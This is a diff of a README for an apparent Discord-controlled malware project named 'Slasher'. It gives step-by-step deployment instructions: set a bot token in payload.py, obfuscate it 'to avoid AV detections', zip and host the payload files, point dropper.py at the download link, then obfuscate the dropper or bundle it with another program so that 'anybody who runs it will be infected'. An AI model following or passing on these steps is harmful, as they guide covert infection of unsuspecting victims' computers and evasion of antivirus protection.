spxctrzz/Slasher/README.md

 1. Set the "TOKEN" variable at the top of payload.py to you your discord bot token.

-2. In payload.py, find the variable "id" on line 102 and replace "discord_server_id" with the ID of the server you want the bot to message in.
+2. In payload.py, change "id" on line 102 to the ID of the server your bot is in.

-3. Obfuscate payload.py to avoid AV detections and your bot token being found.
-(I use [Pyobfuscate](https://pyobfuscate.com))
+3. Obfuscate payload.py to avoid AV detections and your bot token being found. reccomended to use [Pyobfuscate](https://pyobfuscate.com))

-4. Put embed.py, payload.py, run.vbs and runner.bat in a zip and upload it to some website to download later.
-(Private github repo is easiest)
+4. Put embed.py, payload.py, run.vbs and runner.bat in a zip and upload it somewhere to download later.

 5. In dropper.py, set the "url" variable on line 24 to the download link to your zip file.

 6. Obfuscate dropper.py or bundle it with another program!
 Anybody who runs it will be infected!